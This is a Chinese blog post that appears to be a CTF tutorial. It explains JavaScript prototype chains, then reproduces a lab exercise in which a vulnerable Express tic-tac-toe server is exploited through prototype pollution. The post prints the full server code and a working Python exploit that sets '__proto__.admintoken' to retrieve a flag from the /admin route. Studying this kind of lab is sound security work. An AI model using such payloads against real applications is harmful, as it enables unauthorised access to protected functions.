原型链污染例题复现

已于 2023-08-04 00:44:12 修改
阅读量629 收藏 1
点赞数
文章标签: 原型模式
于 2023-08-04 00:33:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57549548/article/details/132094667
版权

一、什么是原型链

下面我们通过这个小例子来看看。

 可以看到b在实例化为test对象以后,就可以输出test类中的属性a了。这是因为在于js中的一个重要的概念:继承。而继承的整个过程就称为该类的原型链。

在javascript中,每个对象的都有一个指向他的原型(prototype)的内部链接,这个原型对象又有它
自己的原型,直到null为止
function i(){
    this.a = "test1";
    this.b = "test2";}

在javascript中一切皆对象,因为所有的变量,函数,数组,对象 都始于object的原型即object.prototype。同时,在js中只有类才有prototype属性,而对象却没有,对象有的是__proto__和类的prototype对应。且二者是等价的

二、什么是原型链污染

先看一个小例子:

mess.js

----

(function()
{
    var secret = ["aaa","bbb"];
    secret.forEach();
})();

attach.html

 在mess.js中我们声明了一个数组 secret,然后该数组调用了属于 Array.protottypeforeach方法,如下

 但是,在调用js文件之前,js代码中将Array.prototype.foreach方法进行了重写,而prototype链为secret -> Array.prototype ->object.prototype,secret中无 foreach 方法,所以就会向上检索,就找到了Array.prototype 而其foreach方法已经被重写过了,所以会执行输出。

这就是原型链污染。很明显,原型链污染就是:在我们想要利用的代码之前的赋值语句如果可控的话,我们进行 ——__proto__ 赋值,之后就可以利用代码了

三、原型链污染例题

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。

由代码可知,全文没有对user.admintokn 进行赋值,所以理论上这个值时不存在的,但是下面有一句赋值语句:

matrix[client.row][client.col] = client.data

data,row,col,都是我们post传入的值,都是可控的。所以可以构造原型链污染,下面我们先本地测试一下  

 下面我们给出payload和结果 :

import requests
import json

url1 = "http://127.9.1:3000/api"
url2 = "http://127.0.0.1:3000/admin?querytoken=a3c23537bfc1e2da4a511661547d65fb"

s = requests.session()

headers = {"Content-Type":"application/json"}
data1 = {"row":"__proto__","col":"admintoken","data":"sunsec"}

res1 = s.post(url1,headers=headers,data = json.dumps(data1))
res2 = s.get(url2)

print res2.text
输出结果:
Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerousk}</b>

王凯-20
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
马氏链例题讲解.doc
05-17
总的来说,马尔科夫链在这些例题中被用来建模随机过程,如张三跑步的鞋状况、商店库存变化、数字通信系统的编码转换和特定状态的性质分析。通过理解马尔科夫链的概念、状态空间、转移概率和平稳分布,我们可以解决...
尺寸链计算例题及习题
06-24
在给定的例题中,我们看到两个具体的案例,分别涉及到齿轮内孔和零件内孔的加工。 首先,让我们分析第一个例子。在这个例子中,我们需要计算在插键槽工序中的尺寸 A。加工顺序是先镗孔至 Ø39.60+0.1mm,然后插键槽...
复现原型链污染
weixin_64623293的博客
08-07 210
是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法2.一个对象的__proto__属性,指向这个对象所在的类的prototype属性对于对象son,在调用。
原型链污染漏洞案例实战二
weixin_51525416的博客
08-05 3490
在server.js代码中: merge 首先需要传参body进行原型链污染,其污染的对象是sourceURL。用户提交的信息,用merge方法合并到session里,多次提交,session里最终保存你提交的所有信息。获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。merge 函数作用是进行对象的合并,其中涉及到了对象的赋值,且键值可控,这样就可以触发原形链污染了。这个属性原本是没有赋值的,默认取空字符串。获取flag的条件是。
网络安全之原型链污染
m0_68976043的博客
08-03 2813
从以上的简单抛出和讲解我们不难看出原型链污染玩的就是两个重要的概念1.原型继承2.属性查找机制,让我们维持着这两个理念看看题型,在题型中理解原型链污染JavaScript中的对象可以通过原型继承从其他对象继承属性和方法。每个对象都有一个指向其原型的链接,通过这个链接可以访问原型对象的属性和方法。当访问一个对象的属性或方法时,JavaScript引擎会首先在对象本身查找,如果找不到,它会沿着原型链向上查找,直到找到属性或方法或者到达原型链的末端。
漏洞复现--原型链污染、沙箱逃逸绕过
weixin_53434577的博客
08-02 642
如果没有,JS 会检查原型的原型,以此类推,直到原型为。,\,[,]并且过滤了弹窗函数alert,prompt,confirm,这样的一个正则。通过分析题目,其中有一个敏感函数merge,merge 函数作用是进行对象的合并,其中涉及到了对象的赋值,且键值可控,这样就可以触发原形链污染了。沙箱内部找到一个沙箱外部的对象(即沙箱内部可以进行访问沙箱外部),借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱。注意:进行三次打印,前俩次没有污染,打印结果一致,第三次被污染打印结果为修改后的,即原型被改变。
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 1963
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
JS沙箱绕过以及竞争条件型漏洞复现
求大佬师傅带
08-02 605
JS沙箱绕过以及竞争条件型漏洞复现
Web 方向学习路线
Love&Share
01-10 2144
文档由齐鲁师范学院网络安全社团授权发布,关注官方公众号获得更多技术类文章 入门 安全职业介绍 以下几项没有先后顺序,不是说要把编程语言精通之后再去学习后边的,而是可以一边学语言一边学漏洞,自己不知道咋规划建议看学习资料-综合教程部分,入门还是以CTF为主 前导 提问的智慧 https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way/blob/main/README-zh_CN.md 以下根据自己的学习方法来,如果觉得看字太慢的话,可
ctf刷题记录1(完结)
m0_73973498的博客
10-08 511
可以看出theme后面的是经过base64加密的,解码后为:/var/www/html/system/tmp/theme/default/a.zip 发现就是该文件的地址,猜测flag文件在根目录下,将/flag加密后的L2ZsYWc=拼接上去,得到http://node4.anna.nssctf.cn:28521/admin.php?(这道题搜不到)然后就是测试后台网站,御剑扫出了admin.php,进入后发现是一个登录界面,提示密码是五位数字,可以爆破一下,最后账号是admin,密码是12345。
数学建模例题数学建模例题.doc
06-27
数学建模例题
liti_数学建模例题_
10-02
《数学建模例题解析与应用》 数学建模,作为一种将实际问题抽象为数学模型的方法,是理解和解决复杂现实问题的重要工具。本资料“liti_数学建模例题_”聚焦于数学建模课程中的课后例题,旨在为学习者提供深入理解和...
ABAQUS经典例题集1.pdf
04-24
ABAQUS经典例题集1
2024-07-24 buildroot c语言应用获取 kernel kobject_uevent_env 发送的消息,侦测USB口变化。
海月汐辰
07-24 225
3.1 kernel 使用kobject_uevent_env 发送信息。3.2 c语言app代码。
寄生组合式继承
m0_46543935的博客
07-23 321
寄生组合式继承(Parasitic Combination Inheritance)是 JavaScript 中实现继承的一种方式,它结合了组合继承和寄生继承的优点,同时避免了组合继承中的性能问题。组合继承会导致父类构造函数被调用两次,而寄生组合式继承通过使用原型链来避免这一问题。给子类添加一个调用父类构造函数的函数,并传递相应的参数。创建父类原型的一个副本,并将其赋值给子类的原型。修正子类的构造函数指针。
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
[毕设]Delphi题库管理与试卷自动生成系统.zip
最新发布
07-27
[毕设]Delphi题库管理与试卷自动生成系统
尺寸链计算及例题讲解bilibili
07-23
### 回答1: 尺寸链计算是一种计算尺寸关系的方法,用于确定不同尺寸之间的比例关系。在设计和绘图中,尺寸链计算有着重要的应用。 例如,现在我们需要绘制一幅图,其中一个物体的尺寸已知,而其他物体的尺寸需要按照比例来确定。这时,我们可以使用尺寸链计算来帮助我们确定这些物体的尺寸。 首先,我们需要确定一个尺寸作为基准,可以选择任意一个已知的尺寸作为基准。然后,我们选取另一个物体的尺寸,并与基准尺寸进行比例计算。比如,如果基准尺寸为10cm,而另一个物体的比例为1:2,那么我们可以通过计算得知该物体的尺寸为20cm。 接下来,如果我们需要确定更多物体的尺寸,我们可以按照同样的方法进行计算。比如,如果我们需要确定第三个物体的尺寸,而它与上一个物体的比例为1:3,我们可以得知第三个物体的尺寸为60cm。 通过尺寸链计算,我们可以轻松地确定不同物体之间的尺寸比例关系,从而有效地绘制图形和设计物体。 在实际应用中,尺寸链计算也会遇到一些复杂的情况,比如多个物体之间相互影响的尺寸关系。在这种情况下,我们需要将问题进行细分,逐个计算每个物体的尺寸,并根据其相对关系进行调整。 总之,尺寸链计算是一种重要的计算方法,能够帮助我们确定不同物体之间的尺寸比例关系,从而更好地进行设计和绘图。 ### 回答2: 尺寸链计算是一种计算机图形学中常用的方法,用于确定对象在不同坐标系下的位置和尺寸。它通过定义对象之间的关系,使得一个对象的尺寸和位置可以相对于另一个对象的尺寸和位置进行计算。 尺寸链计算的基本原理是使用一个参考对象,以及它与其他对象之间的关系来计算其他对象的尺寸和位置。参考对象可以是屏幕、窗口、容器等,而其他对象可以是其中的子对象或者其他相关对象。通过维护对象与参考对象之间的关系,可以方便地调整对象的尺寸和位置。 例如,在一个屏幕上有一个方形容器A,容器A中有一个矩形图像B。容器A的位置和尺寸相对于屏幕来说是已知的,而图像B的位置和尺寸相对于容器A来说是已知的。现在需要计算图像B在屏幕上的位置和尺寸,可以使用尺寸链计算。首先,容器A的位置和尺寸可以作为参考,这样图像B的位置和尺寸就可以相对于容器A来计算。然后,通过将容器A的位置和尺寸与图像B的位置和尺寸相加,就可以得到图像B在屏幕上的位置和尺寸。 尺寸链计算在计算机图形学中有广泛的应用,例如在游戏开发中用于物体的布局和碰撞检测,以及在GUI界面设计中用于控件的排列和大小调整等。它提供了一种灵活、简洁和可扩展的方式来处理对象间的位置和尺寸关系。 总之,尺寸链计算是一种在计算机图形学中常用的方法,通过定义对象之间的关系来计算对象的尺寸和位置。它可以应用于各种场景,提供了方便有效的计算方式。 ### 回答3: 尺寸链计算是指通过一系列的数学运算,计算出物体在不同尺度下的大小关系。具体而言,尺寸链计算常见于图像处理、计算机视觉和机器学习等领域中。 在尺寸链计算中,我们首先需要定义一个参考尺度,例如图像的像素尺度或物体的实际尺度。接下来,我们通过比较物体在不同尺度上的大小关系,计算出它们之间的尺度变化比例。最常见的尺度链计算方法是利用比例尺的概念,根据物体在不同尺度上的像素数量或实际长度,计算出它们之间的比例关系。 例如,假设有一张图像,我们想要计算其中目标物体的尺度链。首先,我们可以选择一个参考尺度,比如目标物体在图像中的像素数量。然后,我们在不同尺度下调整图像的大小,并计算目标物体在每个尺度上的像素数量。通过比较这些像素数量,我们可以计算出物体在不同尺度上的尺度变化比例。 尺寸链计算在计算机视觉中有广泛的应用。例如,在目标检测任务中,我们可以通过计算物体的尺度链,来判断不同尺度下目标物体的特征和位置。这对于实现多尺度目标检测非常重要。 总结而言,尺寸链计算通过比较物体在不同尺度上的大小关系,计算出它们之间的尺度变化比例。它在图像处理、计算机视觉和机器学习等领域中具有重要的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值